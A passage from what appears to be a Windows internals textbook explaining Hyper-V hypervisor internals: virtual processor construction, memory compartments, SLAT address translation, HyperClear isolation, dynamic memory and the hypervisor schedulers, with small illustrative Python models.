processor context, specified by the HvLoader at boot time, into the VM_VP structure and then creates the VP's private address space and attaches to it (only if address space isolation is enabled).
Finally, it creates the VP’s backing thread. This is an important step: the construction of the virtual
processor continues in the context of its own backing thread. The hypervisor’s main system thread at
this stage waits until the new BSP VP is completely initialized. The wait brings the hypervisor scheduler
to select the newly created thread, which executes a routine, ObConstructVp, that constructs the VP in the context of its new backing thread.
ObConstructVp, similarly to the partition-creation path, constructs and initializes each layer of the virtual processor; in particular, the following:

1. The Virtualization Manager (VM) layer attaches the physical processor data structure (CPU_PLS) to the VP and sets VTL 0 as active.

2. The VAL layer initializes the platform-dependent portions of the VP, like its registers, XSAVE area, stack, and debug data. Furthermore, for each supported VTL, it allocates and initializes the VMCS data structure (VMCB for AMD systems), which is used by the hardware for keeping track of the state of the virtual machine, and the VTL's SLAT page tables. The latter allow each VTL to be isolated from the others (more details about VTLs are provided later in the "Virtual Trust Levels (VTLs) and Virtual Secure Mode (VSM)" section). Finally, the VAL layer enables and sets VTL 0 as active. The platform-specific VMCS (or VMCB for AMD systems) is entirely compiled, the SLAT table of VTL 0 is set as active, and the real-mode emulator is initialized. The Host-state part of the VMCS is set to target the hypervisor VAL dispatch loop. This routine is the most important part of the hypervisor because it manages all the VMEXIT events generated by each guest.

3. The VP layer allocates the VP's hypercall page and, for each VTL, the assist and intercept message pages. These pages are used by the hypervisor for sharing code or data with the guest operating system.
When ObConstructVp finishes its work, the VP’s dispatch thread activates the virtual processor and
its synthetic interrupt controller (SynIC). If the VP is the first one of the root partition, the dispatch
thread restores the initial VP’s context stored in the VM_VP data structure by writing each captured
register in the platform-dependent VMCS (or VMCB) processor area (the context has been specified
by the HvLoader earlier in the boot process). The dispatch thread finally signals the completion of the
VP initialization (as a result, the main system thread enters the idle loop) and enters the platform-
dependent VAL dispatch loop. The VAL dispatch loop detects that the VP is new, prepares it for the first
execution, and starts the new virtual machine by executing a VMLAUNCH instruction. The new VM
restarts exactly at the point at which the HvLoader has transferred the execution to the hypervisor. The
boot process continues normally but in the context of the new hypervisor partition.
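The core idea of the VAL dispatch loop, launching the guest, receiving a VMEXIT, virtualizing the event, and resuming, can be sketched as follows. The exit reasons and handler names are invented; this is a model of the control flow, not real hypervisor code.

```python
# A minimal sketch of the VAL dispatch loop idea: consume VMEXIT events,
# emulate each one, and resume the guest, until the VP stops executing.
# The scripted event list stands in for real hardware-generated exits.

def val_dispatch_loop(vmexits):
    """Process a scripted sequence of VMEXIT events and return a handling log."""
    handled = []
    for exit_reason in vmexits:
        if exit_reason == "halt":
            handled.append("vp-idle")
            break                        # the VP stops executing
        # Every other exit is virtualized and the guest is resumed.
        handled.append(f"emulated-{exit_reason}")
    return handled

log = val_dispatch_loop(["cpuid", "io-port", "halt"])
```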
The hypervisor memory manager
The hypervisor memory manager is relatively simple compared to the memory manager for NT or the
Secure Kernel. The entity that manages a set of physical memory pages is the hypervisor’s memory
compartment. Before the hypervisor startup takes place, the hypervisor loader (Hvloader.dll) allocates
the hypervisor loader block and pre-calculates the maximum number of physical pages that will be
used by the hypervisor for correctly starting up and creating the root partition. The number depends
on the pages used to initialize the IOMMU to store the memory range structures, the system PFN data-
base, SLAT page tables, and HAL VA space. The hypervisor loader preallocates the calculated number
of physical pages, marks them as reserved, and attaches the page list array in the loader block. Later,
when the hypervisor starts, it creates the root compartment by using the page list that was allocated
by the hypervisor loader.
Figure 9-7 shows the layout of the memory compartment data structure. The data structure keeps
track of the total number of physical pages “deposited” in the compartment, which can be allocated
somewhere or freed. A compartment stores its physical pages in different lists ordered by the NUMA
node. Only the head of each list is stored in the compartment. The state of each physical page and
its link in the NUMA list is maintained thanks to the entries in the PFN database. A compartment also
tracks its relationship with the root. A new compartment can be created using the physical pages that
belongs to the parent (the root). Similarly, when the compartment is deleted, all its remaining physical
pages are returned to the parent.
FIGURE 9-7 The hypervisor's memory compartment (the parent compartment, global zone, deposited and free page counts, and per-NUMA-node physical page lists linked through the PFN database). Virtual address space for the global zone is reserved from the end of the compartment data structure.
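The compartment lifecycle described above, pages deposited from a parent, allocated and freed, and returned to the parent on deletion, can be modeled as follows. NUMA lists and the PFN database are omitted; all names are invented for the sketch.

```python
# Illustrative model of a memory compartment's page accounting.

class Compartment:
    def __init__(self, parent=None, pages=None):
        self.parent = parent
        self.free_pages = list(pages or [])

    def deposit(self, pages):
        self.free_pages.extend(pages)

    def allocate(self, count):
        if count > len(self.free_pages):
            raise MemoryError("INSUFFICIENT_MEMORY")
        taken, self.free_pages = self.free_pages[:count], self.free_pages[count:]
        return taken

    def delete(self):
        # Remaining physical pages are returned to the parent compartment.
        if self.parent is not None:
            self.parent.deposit(self.free_pages)
        self.free_pages = []

root = Compartment(pages=range(100))                 # 100 pages in the root
child = Compartment(parent=root, pages=root.allocate(10))
child.allocate(4)                                    # child uses 4 of its 10 pages
child.delete()                                       # 6 remaining pages go back to root
```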
When the hypervisor needs some physical memory for any kind of work, it allocates from the ac-
tive compartment (depending on the partition). This means that the allocation can fail. Two possible
scenarios can arise in case of failure:
I
If the allocation has been requested for a service internal to the hypervisor (usually on behalf
of the root partition), the failure should not happen, and the system is crashed. (This explains
why the initial calculation of the total number of pages to be assigned to the root compartment
needs to be accurate.)
I
If the allocation has been requested on behalf of a child partition (usually through a hypercall),
the hypervisor will fail the request with the status INSUFFICIENT_MEMORY. The root partition
detects the error and performs the allocation of some physical page (more details are discussed
later in the “Virtualization stack” section), which will be deposited in the child compartment
through the HvDepositMemory hypercall. The operation can be finally reinitiated (and usually
will succeed).
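The two failure paths can be sketched side by side: a failed internal (root) allocation is fatal, whereas a child's failed allocation returns INSUFFICIENT_MEMORY so the root can deposit pages (via the HvDepositMemory hypercall in the real system) and the operation can be retried. The function and class names here are invented.

```python
# Sketch of the two allocation-failure scenarios described above.

class SimpleCompartment:
    def __init__(self, pages):
        self.pages = list(pages)
    def pop_pages(self, count):
        if count > len(self.pages):
            raise MemoryError
        out, self.pages = self.pages[:count], self.pages[count:]
        return out
    def deposit(self, pages):
        self.pages.extend(pages)

def hypercall_allocate(compartment, count, on_behalf_of_root):
    try:
        return ("SUCCESS", compartment.pop_pages(count))
    except MemoryError:
        if on_behalf_of_root:
            # Internal hypervisor allocations must never fail.
            raise SystemError("bugcheck: hypervisor out of memory")
        return ("INSUFFICIENT_MEMORY", None)

child = SimpleCompartment(pages=[1, 2])
status, _ = hypercall_allocate(child, 4, on_behalf_of_root=False)
# The root partition notices the failure and deposits more pages,
# modeling the HvDepositMemory hypercall, then the request is retried.
child.deposit([3, 4, 5, 6])
retry_status, frames = hypercall_allocate(child, 4, on_behalf_of_root=False)
```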
The physical pages allocated from the compartment are usually mapped in the hypervisor using a
virtual address. When a compartment is created, a virtual address range (sized 4 or 8 GB, depending on
whether the compartment is a root or a child) is allocated with the goal of mapping the new compart-
ment, its PDE bitmap, and its global zone.
A hypervisor’s zone encapsulates a private VA range, which is not shared with the entire hypervisor
address space (see the “Isolated address space” section later in this chapter). The hypervisor executes
with a single root page table (differently from the NT kernel, which uses KVA shadowing). Two entries in
the root page table page are reserved with the goal of dynamically switching between each zone and
the virtual processors’ address spaces.
Partitions’ physical address space
As discussed in the previous section, when a partition is initially created, the hypervisor allocates a
physical address space for it. A physical address space contains all the data structures needed by the
hardware to translate the partition’s guest physical addresses (GPAs) to system physical addresses
(SPAs). The hardware feature that enables the translation is generally referred to as second level ad-
dress translation (SLAT). The term SLAT is platform-agnostic: hardware vendors use different names:
Intel calls it EPT for extended page tables; AMD uses the term NPT for nested page tables; and ARM
simply calls it Stage 2 Address Translation.
The SLAT is usually implemented in a way that’s similar to the implementation of the x64 page
tables, which use four levels of translation (x64 virtual address translation has already been discussed
in detail in Chapter 5 of Part 1). The OS running inside the partition uses the same virtual address
translation as if it were running on bare-metal hardware. When it runs in a partition, however, the physical
processor actually executes two levels of translation: one for virtual addresses and one for translating guest
physical addresses. Figure 9-8 shows the SLAT set up for a guest partition. In a guest partition, a GPA is
usually translated to a different SPA. This is not true for the root partition.
[Figure content: Process A in Guest A translates virtual addresses through its page tables (CR3) into guest physical memory; EPT A then maps the guest frames to host physical memory.]
FIGURE 9-8 Address translation for a guest partition.
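The two-level translation shown in Figure 9-8 can be modeled with a small sketch. Single-level dictionaries stand in for the real four-level page table and SLAT hierarchies; the frame numbers are invented for illustration.

```python
# Minimal model of two-level address translation: the guest's page tables
# map virtual addresses to guest physical addresses (GPAs), and the SLAT
# (EPT/NPT) maps GPAs to system physical addresses (SPAs). Flat dicts
# stand in for the real four-level hierarchies.

PAGE_SHIFT = 12

guest_page_table = {0x10: 0x560, 0x11: 0x564}   # guest VPN -> guest PFN
slat = {0x560: 0x800, 0x564: 0x804}             # guest PFN -> system PFN

def translate(gva):
    """Translate a guest virtual address to a system physical address,
    as the hardware does when SLAT is enabled."""
    vpn, offset = gva >> PAGE_SHIFT, gva & 0xFFF
    gpfn = guest_page_table[vpn]     # first level: guest page tables
    spfn = slat[gpfn]                # second level: SLAT
    return (spfn << PAGE_SHIFT) | offset

print(hex(translate(0x10ABC)))  # 0x800abc
```

For the root partition under identity mapping, the `slat` dictionary would simply map each guest PFN to the same system PFN.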
When the hypervisor creates the root partition, it builds its initial physical address space by using
identity mapping. In this model, each GPA corresponds to the same SPA (for example, guest frame
0x1000 in the root partition is mapped to the bare-metal physical frame 0x1000). The hypervisor preal-
locates the memory needed for mapping the entire physical address space of the machine (which has
been discovered by the Windows Loader using UEFI services; see Chapter 12 for details) into all the
allowed root partition’s virtual trust levels (VTLs). (The root partition usually supports two VTLs.) The
SLAT page tables of each VTL belonging to the partition include the same GPA and SPA entries but usually
with a different protection level set. The protection level applied to each partition’s physical frame
allows the creation of different security domains (VTLs), which can be isolated from one another. VTLs
are explained in detail in the section “The Secure Kernel” later in this chapter. The hypervisor pages
are marked as hardware-reserved and are not mapped in the partition’s SLAT table (actually, they are
mapped using an invalid entry pointing to a dummy PFN).
Note For performance reasons, the hypervisor, while building the physical
memory mapping, is able to detect large chunks of contiguous physical mem-
ory, and, in a similar way as for virtual memory, is able to map those chunks by
using large pages. If for some reason the OS running in the partition decides to
apply a more granular protection to the physical page, the hypervisor would
use the reserved memory for breaking the large page in the SLAT table.
Earlier versions of the hypervisor also supported another technique for map-
ping a partition’s physical address space: shadow paging. Shadow paging was
used for those machines without SLAT support. This technique had a very
high performance overhead; as a result, it’s no longer supported. (The machine
must support SLAT; otherwise, the hypervisor refuses to start.)
The SLAT table of the root is built at partition-creation time, but for a guest partition, the situation is
slightly different. When a child partition is created, the hypervisor creates its initial physical address space
but allocates only the root page table (PML4) for each partition’s VTL. Before starting the new VM, the
VID driver (part of the virtualization stack) reserves the physical pages needed for the VM (the exact
number depends on the VM memory size) by allocating them from the root partition. (Remember, we
are talking about physical memory; only a driver can allocate physical pages.) The VID driver maintains
a list of physical pages, which is analyzed and split into large pages and then sent to the hypervisor
through the HvMapGpaPages Rep hypercall.
Before sending the map request, the VID driver calls into the hypervisor for creating the needed
SLAT page tables and internal physical memory space data structures. Each SLAT page table hierarchy
is allocated for each available VTL in the partition (this operation is called pre-commit). The operation
can fail, such as when the new partition’s compartment could not contain enough physical pages. In
this case, as discussed in the previous section, the VID driver allocates more memory from the root par-
tition and deposits it in the child’s partition compartment. At this stage, the VID driver can freely map
all the child’s partition physical pages. The hypervisor builds and compiles all the needed SLAT page
tables, assigning different protection based on the VTL level. (Large pages require one less indirection
level.) This step concludes the child partition’s physical address space creation.
Address space isolation
Speculative execution vulnerabilities discovered in modern CPUs (also known as Meltdown, Spectre,
and Foreshadow) allowed an attacker to read secret data located in a more privileged execution
context by speculatively reading the stale data located in the CPU cache. This means that software
executed in a guest VM could potentially be able to speculatively read private memory that belongs to
the hypervisor or to the more privileged root partition. The internal details of the Spectre, Meltdown,
and all the side-channel vulnerabilities and how they are mitigated by Windows have been covered in
detail in Chapter 8.
The hypervisor has been able to mitigate most of these kinds of attacks by implementing the
HyperClear mitigation. The HyperClear mitigation relies on three key components to ensure strong
Inter-VM isolation: core scheduler, Virtual-Processor Address Space Isolation, and sensitive data scrub-
bing. In modern multicore CPUs, often different SMT threads share the same CPU cache. (Details about
the core scheduler and symmetric multithreading are provided in the “Hyper-V schedulers” section.) In
the virtualization environment, SMT threads on a core can independently enter and exit the hypervisor
context based on their activity. For example, events like interrupts can cause an SMT thread to switch
out of running the guest virtual processor context and begin executing the hypervisor context. This can
happen independently for each SMT thread, so one SMT thread may be executing in the hypervisor
context while its sibling SMT thread is still running a VM’s guest virtual processor context. An attacker
running code in a less trusted guest VM’s virtual processor context on one SMT thread can then use a
side channel vulnerability to potentially observe sensitive data from the hypervisor context running on
the sibling SMT thread.
The hypervisor provides strong data isolation to protect against a malicious guest VM by maintain-
ing separate virtual address ranges for each guest SMT thread (which back a virtual processor). When
the hypervisor context is entered on a specific SMT thread, no secret data is addressable. The only data
that can be brought into the CPU cache is associated with the current guest virtual processor or
represents shared hypervisor data. As shown in Figure 9-9, when a VP running on an SMT thread enters the
hypervisor, the core scheduler enforces that the sibling LP is running another VP that belongs
to the same VM. Furthermore, no shared secrets are mapped in the hypervisor. If the hypervisor
needs to access secret data, it ensures that no other VP is scheduled on the sibling SMT thread.
[Figure content: Core 0 and Core 1, each with an L1 data cache shared by two LPs; VM A’s VP 0 and VP 1 run on Core 0’s sibling LPs, while VM B’s VP 0 runs on Core 1 with its sibling LP left unused.]
FIGURE 9-9 The HyperClear mitigation.
Unlike the NT kernel, the hypervisor always runs with a single page table root, which creates a single
global virtual address space. The hypervisor defines the concept of private address space, which has
a misleading name. Indeed, the hypervisor reserves two global root page table entries (PML4 entries,
which generate a 1-TB virtual address range) for mapping or unmapping a private address space. When
the hypervisor initially constructs the VP, it allocates two private page table root entries. Those will be
used to map the VP’s secret data, like its stack and data structures that contain private data. Switching
the address space means writing the two entries in the global page table root (which explains why the
term private address space has a misleading name—actually it is private address range). The hypervisor
switches private address spaces only in two cases: when a new virtual processor is created and during
thread switches. (Remember, threads are backed by VPs. The core scheduler assures that no sibling SMT
threads execute VPs from different partitions.) During runtime, a hypervisor thread has mapped only
its own VP’s private data; no other secret data is accessible by that thread.
Mapping secret data in the private address space is achieved by using the memory zone, represent-
ed by an MM_ZONE data structure. A memory zone encapsulates a private VA subrange of the private
address space, where the hypervisor usually stores per-VP’s secrets.
The memory zone works similarly to the private address space. Instead of mapping root page table
entries in the global page table root, a memory zone maps private page directories in the two root
entries used by the private address space. A memory zone maintains an array of page directories, which
will be mapped and unmapped into the private address space, and a bitmap that keeps track of the
used page tables. Figure 9-10 shows the relationship between a private address space and a memory
zone. Memory zones can be mapped and unmapped on demand (in the private address space) but are
usually switched only at VP creation time. Indeed, the hypervisor does not need to switch them during
thread switches; the private address space encapsulates the VA range exposed by the memory zone.
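The private address space mechanism just described can be illustrated with a toy model. None of the names below are real hypervisor structures; the model only captures the key idea that a "switch" rewrites two reserved entries in the single global page table root.

```python
# Toy model of the hypervisor's private address space: a single global
# page table root with two reserved PML4 slots, where switching a VP's
# private address space only rewrites those two entries. All names and
# slot indices are invented for illustration.

RESERVED_SLOTS = (2, 3)      # illustrative reserved PML4 indices

class PageTableRoot:
    """A 512-entry PML4; entries other than the reserved ones model the
    shared hypervisor mappings."""
    def __init__(self):
        self.entries = ["shared"] * 512

class PrivateAddressSpace:
    """Two private root entries mapping the VP's secret data (stack, etc.)."""
    def __init__(self, vp_name):
        self.roots = [f"{vp_name}-private-0", f"{vp_name}-private-1"]

def switch_private_space(global_root, space):
    # The "cheap" switch: two entry writes in the global root.
    for slot, entry in zip(RESERVED_SLOTS, space.roots):
        global_root.entries[slot] = entry

root = PageTableRoot()
switch_private_space(root, PrivateAddressSpace("VP0"))
print(root.entries[2], root.entries[3])  # VP0-private-0 VP0-private-1
```

A memory zone would populate page directories beneath these two entries; switching to another VP's space replaces both entries, so the previous VP's secrets are no longer addressable.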
[Figure content: the hypervisor’s page table root (mapping the entire HV) with reserved PML4 entries for the private address space; shared PDPTs, page directories, and page tables alongside the zone’s private PDPTEs, PDEs, and page tables.]
FIGURE 9-10 The hypervisor’s private address spaces and private memory zones.
In Figure 9-10, the page table structures related to the private address space are filled with a pattern,
the ones related to the memory zone are shown in gray, and the shared ones belonging to the
hypervisor are drawn with a dashed line. Switching private address spaces is a relatively cheap operation
that requires the modification of two PML4 entries in the hypervisor’s page table root. Attaching or
detaching a memory zone from the private address space requires only the modification of the zone’s
PDPTEs (a zone’s VA size is variable; the PDPTEs are always allocated contiguously).
Dynamic memory
Virtual machines can use a different percentage of their allocated physical memory. For example,
some virtual machines use only a small amount of their assigned guest physical memory, keeping a lot
of it freed or zeroed. The performance of other virtual machines can instead suffer in high memory-
pressure scenarios, where the page file is used too often because the allocated guest physical memory
is not enough. To prevent this scenario, the hypervisor and the virtualization
stack support the concept of dynamic memory: the ability to dynamically assign
and remove physical memory to and from a virtual machine. The feature is provided by multiple components:
■ The NT kernel’s memory manager, which supports hot add and hot removal of physical memory (on bare-metal systems, too)
■ The hypervisor, through the SLAT (managed by the address manager)
■ The VM Worker process, which uses the dynamic memory controller module, Vmdynmem.dll, to establish a connection to the VMBus Dynamic Memory VSC driver (Dmvsc.sys), which runs in the child partition
To properly describe dynamic memory, we should quickly introduce how the page frame number
(PFN) database is created by the NT kernel. The PFN database is used by Windows to keep track of
physical memory. It was discussed in detail in Chapter 5 of Part 1. For creating the PFN database, the
NT kernel first calculates the hypothetical size needed to map the highest possible physical address
(256 TB on standard 64-bit systems) and then marks the VA space needed to map it entirely as reserved
(storing the base address to the MmPfnDatabase global variable). Note that the reserved VA space still
has no page tables allocated. The NT kernel cycles through each physical memory descriptor discovered
by the boot manager (using UEFI services), coalesces them into the longest possible ranges and,
for each range, maps the underlying PFN database entries using large pages. This has an important
implication; as shown in Figure 9-11, the PFN database has space for the highest possible amount of
physical memory but only a small subset of it is mapped to real physical pages (this technique is called
sparse memory).
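The sparse-memory idea can be sketched with a few lines. A dictionary models the mapped subset of the PFN database: the reserved-but-unbacked VA space corresponds to PFNs that are simply absent. The class and frame numbers are invented for illustration.

```python
# Sketch of a sparse PFN database: virtual space is notionally reserved
# for the highest possible physical address, but backing entries exist
# only for the ranges actually discovered at boot. A dict models the
# mapped subset; absent keys model the unbacked VA holes.

class PfnDatabase:
    def __init__(self):
        self.entries = {}          # pfn -> state; unmapped PFNs are absent

    def map_range(self, first_pfn, count, state="free"):
        """Back the PFN entries for one discovered physical memory range."""
        for pfn in range(first_pfn, first_pfn + count):
            self.entries[pfn] = state

    def lookup(self, pfn):
        return self.entries.get(pfn)  # None models the unmapped hole

db = PfnDatabase()
db.map_range(0x500, 0x100)   # a discovered physical memory descriptor
db.map_range(0x800, 0x100)   # another range; the gap between them stays unmapped
print(db.lookup(0x550), db.lookup(0x700))  # free None
```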
[Figure content: MmPfnDatabase with PFNs 0x500–0x5FF mapped to pages 0x500–0x5FF, a memory hole with no mapping, and PFNs 0x800–0x8FF describing hot-removed memory (set as bad) for pages 0x800–0x8FF.]
FIGURE 9-11 An example of a PFN database where some physical memory has been removed.
Hot add and removal of physical memory works thanks to this principle. When new physical
memory is added to the system, the Plug and Play memory driver (Pnpmem.sys) detects it and calls
the MmAddPhysicalMemory routine, which is exported by the NT kernel. The latter starts a complex
procedure that calculates the exact number of pages in the new range and the NUMA node to which
they belong, and then it maps the new PFN entries in the database by creating the necessary page
tables in the reserved VA space. The new physical pages are added to the free list (see Chapter 5 in
Part 1 for more details).
When some physical memory is hot removed, the system performs an inverse procedure. It checks
that the pages belong to the correct physical page list, updates the internal memory counters (like the
total number of physical pages), and finally frees the corresponding PFN entries, meaning that they
all will be marked as “bad.” The memory manager will never use the physical pages described by them
anymore. No actual virtual space is unmapped from the PFN database. The physical memory that was
described by the freed PFNs can always be re-added in the future.
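The hot add/remove behavior just described can be modeled in a short sketch. The function names echo (but are not) the NT kernel's MmAddPhysicalMemory and MmRemovePhysicalMemory, and the single free list is a simplification of the real page lists.

```python
# Simplified model of hot add/remove: hot add maps new PFN entries and
# puts the pages on the free list; hot remove marks the PFN entries
# "bad" so the memory manager never uses them again, without unmapping
# any virtual space. Names mirror (but are not) the NT kernel APIs.

pfn_db = {}      # pfn -> state ("free" or "bad")
free_list = []

def add_physical_memory(first_pfn, count):
    """Hot add: create PFN entries and put the pages on the free list."""
    for pfn in range(first_pfn, first_pfn + count):
        pfn_db[pfn] = "free"
        free_list.append(pfn)

def remove_physical_memory(first_pfn, count):
    """Hot remove: only free pages may go; entries stay, marked bad."""
    for pfn in range(first_pfn, first_pfn + count):
        if pfn_db.get(pfn) != "free":
            return False
    for pfn in range(first_pfn, first_pfn + count):
        pfn_db[pfn] = "bad"       # entry stays in the database, unusable
        free_list.remove(pfn)
    return True

add_physical_memory(0x800, 4)
assert remove_physical_memory(0x800, 4)
print(pfn_db[0x800])  # bad
```

Because the "bad" entries remain in place, re-adding the same physical range later only needs to flip their state back, matching the text's observation that no virtual space is ever unmapped from the PFN database.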
When an enlightened VM starts, the dynamic memory driver (Dmvsc.sys) detects whether the child
VM supports the hot add feature; if so, it creates a worker thread that negotiates the protocol and
connects to the VMBus channel of the VSP. (See the “Virtualization stack” section later in this chapter
for details about VSC and VSP.) The VMBus connection channel connects the dynamic memory driver
running in the child partition to the dynamic memory controller module (Vmdynmem.dll), which is
mapped in the VM Worker process in the root partition. A message exchange protocol is started. Every
second, the child partition acquires a memory pressure report by querying different performance
counters exposed by the memory manager (global page-file usage; number of available, committed,
and dirty pages; number of page faults per seconds; number of pages in the free and zeroed page list).
The report is then sent to the root partition.
The VM Worker process in the root partition uses the services exposed by the VMMS balancer, a
component of the VmCompute service, to determine whether a hot add operation is possible. If the
memory status of the root partition allows a hot add operation, the VMMS balancer calculates the
proper number of pages to deposit in the child partition and calls back (through COM) into the VM
Worker process, which starts the hot add operation with the assistance of the VID driver:
1. Reserves the proper amount of physical memory in the root partition
2. Calls the hypervisor to map the system physical pages reserved by the root partition to some guest physical pages mapped in the child VM, with the proper protection
3. Sends a message to the dynamic memory driver to start a hot add operation on some guest physical pages previously mapped by the hypervisor
The dynamic memory driver in the child partition uses the MmAddPhysicalMemory API exposed by
the NT kernel to perform the hot add operation. The latter maps the PFNs describing the new guest
physical memory in the PFN database, adding new backing pages to the database if needed.
In a similar way, when the VMMS balancer detects that the child VM has plenty of physical pages
available, it may require the child partition (still through the VM Worker process) to hot remove some
physical pages. The dynamic memory driver uses the MmRemovePhysicalMemory API to perform the
hot remove operation. The NT kernel verifies that each page in the range specified by the balancer is
either on the zeroed or free list, or it belongs to a stack that can be safely paged out. If all the condi-
tions apply, the dynamic memory driver sends back the “hot removal” page range to the VM Worker
process, which will use services provided by the VID driver to unmap the physical pages from the child
partition and release them back to the NT kernel.
Note Dynamic memory is not supported when nested virtualization is enabled.
Hyper-V schedulers
The hypervisor is a kind of micro operating system that runs below the root partition’s OS (Windows).
As such, it should be able to decide which thread (backing a virtual processor) is being executed by
which physical processor. This is especially true when the system runs multiple virtual machines that
together comprise more virtual processors than the physical processors installed in the machine. The
hypervisor scheduler’s role is to select the next thread that a physical CPU executes after the allocated
time slice of the current one ends. Hyper-V can use three different schedulers. To properly manage all
the different schedulers, the hypervisor exposes the scheduler APIs, a set of routines that are the only
entries into the hypervisor scheduler. Their sole purpose is to redirect API calls to the particular sched-
uler implementation.
EXPERIMENT: Controlling the hypervisor’s scheduler type
Whereas client editions of Windows start by default with the root scheduler, Windows Server 2019
runs by default with the core scheduler. In this experiment, you figure out the hypervisor scheduler
enabled on your system and find out how to switch to another kind of hypervisor scheduler on the
next system reboot.
The Windows hypervisor logs a system event after it has determined which scheduler to en-
able. You can search the logged event by using the Event Viewer tool, which you can run by typ-
ing eventvwr in the Cortana search box. After the applet is started, expand the Windows Logs
key and click the System log. You should search for events with ID 2 and the Event sources set to
Hyper-V-Hypervisor. You can do that by clicking the Filter Current Log button located on the
right of the window or by clicking the Event ID column, which will order the events in ascending
order by their ID (keep in mind that the operation can take a while). If you double-click a found
event, you should see a window like the following:
The launch event ID 2 denotes the hypervisor scheduler type, where
1 = Classic scheduler, SMT disabled
2 = Classic scheduler
3 = Core scheduler
4 = Root scheduler
The sample figure was taken from a Windows Server system, which runs by default with the
Core Scheduler. To change the scheduler type to the classic one (or root), you should open an ad-
ministrative command prompt window (by typing cmd in the Cortana search box and selecting
Run As Administrator) and type the following command:
bcdedit /set hypervisorschedulertype <Type>
where <Type> is Classic for the classic scheduler, Core for the core scheduler, or Root for the
root scheduler. You should restart the system and check again the newly generated Hyper-V-
Hypervisor event ID 2. You can also check the current enabled hypervisor scheduler by using an
administrative PowerShell window with the following command:
Get-WinEvent -FilterHashTable @{ProviderName="Microsoft-Windows-Hyper-V-Hypervisor"; ID=2}
-MaxEvents 1
The command extracts the last Event ID 2 from the System event log.
The classic scheduler
The classic scheduler has been the default scheduler used on all versions of Hyper-V since its initial
release. The classic scheduler in its default configuration implements a simple, round-robin policy in
which any virtual processor in the current execution state (the execution state depends on the total
number of VMs running in the system) is equally likely to be dispatched. The classic scheduler also
supports setting a virtual processor’s affinity and makes scheduling decisions considering the physical
processor’s NUMA node. The classic scheduler doesn’t know what a guest VP is currently executing.
The only exception is defined by the spin-lock enlightenment. When the Windows kernel, which is running
in a partition, is going to perform an active wait on a spin-lock, it emits a hypercall to inform
the hypervisor (high IRQL synchronization mechanisms are described in Chapter 8, “System
mechanisms”). The classic scheduler can preempt the current executing virtual processor (which
hasn’t expired its allocated time slice yet) and can schedule another one. In this way it saves the active
CPU spin cycles.
The default configuration of the classic scheduler assigns an equal time slice to each VP. This means
that in high-workload oversubscribed systems, where multiple virtual processors attempt to execute,
and the physical processors are sufficiently busy, performance can quickly degrade. To overcome
the problem, the classic scheduler supports different fine-tuning options (see Figure 9-12), which can
modify its internal scheduling decision:
■ VP reservations A user can reserve CPU capacity in advance on behalf of a guest machine. The reservation is specified as the percentage of the capacity of a physical processor to be made available to the guest machine whenever it is scheduled to run. As a result, Hyper-V schedules the VP to run only if that minimum amount of CPU capacity is available (meaning that the allocated time slice is guaranteed).
■ VP limits Similar to VP reservations, a user can limit the percentage of physical CPU usage for a VP. This means reducing the available time slice allocated to a VP in a high-workload scenario.
■ VP weight This controls the probability that a VP is scheduled when the reservations have already been met. In default configurations, each VP has an equal probability of being executed. When the user configures weight on the VPs that belong to a virtual machine, scheduling decisions become based on the relative weighting factor the user has chosen. For example, let’s assume that a system with four CPUs runs three virtual machines at the same time. The first VM has set a weighting factor of 100, the second 200, and the third 300. Assuming that all the system’s physical processors are allocated to a uniform number of VPs, the probability of a VP in the first VM being dispatched is 17%, of a VP in the second VM 33%, and of a VP in the third one 50%.
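The weighting arithmetic in the example above is each VM's weight divided by the sum of all weights:

```python
# Relative-weight dispatch probabilities from the example: weights of
# 100, 200, and 300 divide by their total (600) to give roughly 17%,
# 33%, and 50%.

weights = {"VM1": 100, "VM2": 200, "VM3": 300}
total = sum(weights.values())
probabilities = {vm: round(100 * w / total) for vm, w in weights.items()}
print(probabilities)  # {'VM1': 17, 'VM2': 33, 'VM3': 50}
```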
FIGURE 9-12 The classic scheduler fine-tuning settings property page, which is available
only when the classic scheduler is enabled.
The core scheduler
Normally, a classic CPU’s core has a single execution pipeline in which streams of instructions are
executed one after each other. An instruction enters the pipe, proceeds through several stages of
execution (load data, compute, store data, for example), and is retired from the pipe. Different types
of instructions use different parts of the CPU core. A modern CPU’s core is often able to execute in an
out-of-order way multiple sequential instructions in the stream (in respect to the order in which they
entered the pipeline). Modern CPUs, which support out-of-order execution, often implement what is
called symmetric multithreading (SMT): a CPU’s core has two execution pipelines and presents more
than one logical processor to the system; thus, two different instruction streams can be executed side
by side by a single shared execution engine. (The resources of the core, like its caches, are shared.) The
two execution pipelines are exposed to the software as single independent processors (CPUs). From
now on, with the term logical processor (or simply LP), we will refer to an execution pipeline of an SMT
core exposed to Windows as an independent CPU. (SMT is discussed in Chapters 2 and 4 of Part 1.)
This hardware implementation has led to many security problems: one instruction executed
by a shared logical CPU can interfere and affect the instruction executed by the other sibling LP.
Furthermore, the physical core’s cache memory is shared; an LP can alter the content of the cache. The
other sibling CPU can potentially probe the data located in the cache by measuring the time employed
by the processor to access the memory addressed by the same cache line, thus revealing “secret data”
accessed by the other logical processor (as described in the “Hardware side-channel vulnerabilities”
section of Chapter 8). The classic scheduler can normally select two threads belonging to different VMs
to be executed by two LPs in the same processor core. This is clearly not acceptable because in this
context, the first virtual machine could potentially read data belonging to the other one.
To overcome this problem, and to be able to run SMT-enabled VMs with predictable performance,
Windows Server 2016 has introduced the core scheduler. The core scheduler leverages the properties
of SMT to provide isolation and a strong security boundary for guest VPs. When the core scheduler is
enabled, Hyper-V schedules virtual cores onto physical cores. Furthermore, it ensures that VPs belong-
ing to different VMs are never scheduled on sibling SMT threads of a physical core. The core scheduler
enables the virtual machine to make use of SMT. The VPs exposed to a VM can be part of an SMT
set. The OS and applications running in the guest virtual machine can use SMT behavior and program-
ming interfaces (APIs) to control and distribute work across SMT threads, just as they would when
run nonvirtualized.
Figure 9-13 shows an example of an SMT system with four logical processors distributed in two CPU
cores. In the figure, three VMs are running. The first and second VMs have four VPs in two groups of two,
whereas the third one has only one assigned VP. The groups of VPs in the VMs are labelled A through E.
Individual VPs in a group that are idle (have no code to execute) are filled with a darker color.
[Figure content: VM 1 with VP groups A and B, VM 2 with VP groups C and D, and VM 3 with the single-VP group E; CPU cores 1 and 2 each have a run list and a deferred list of VP groups, with idle VPs shaded darker.]
FIGURE 9-13 A sample SMT system with two processors’ cores and three VMs running.
Each core has a run list containing groups of VPs that are ready to execute, and a deferred list of
groups of VPs that are ready to run but have not been added to the core’s run list yet. The groups of
VPs execute on the physical cores. If all VPs in a group become idle, then the VP group is descheduled
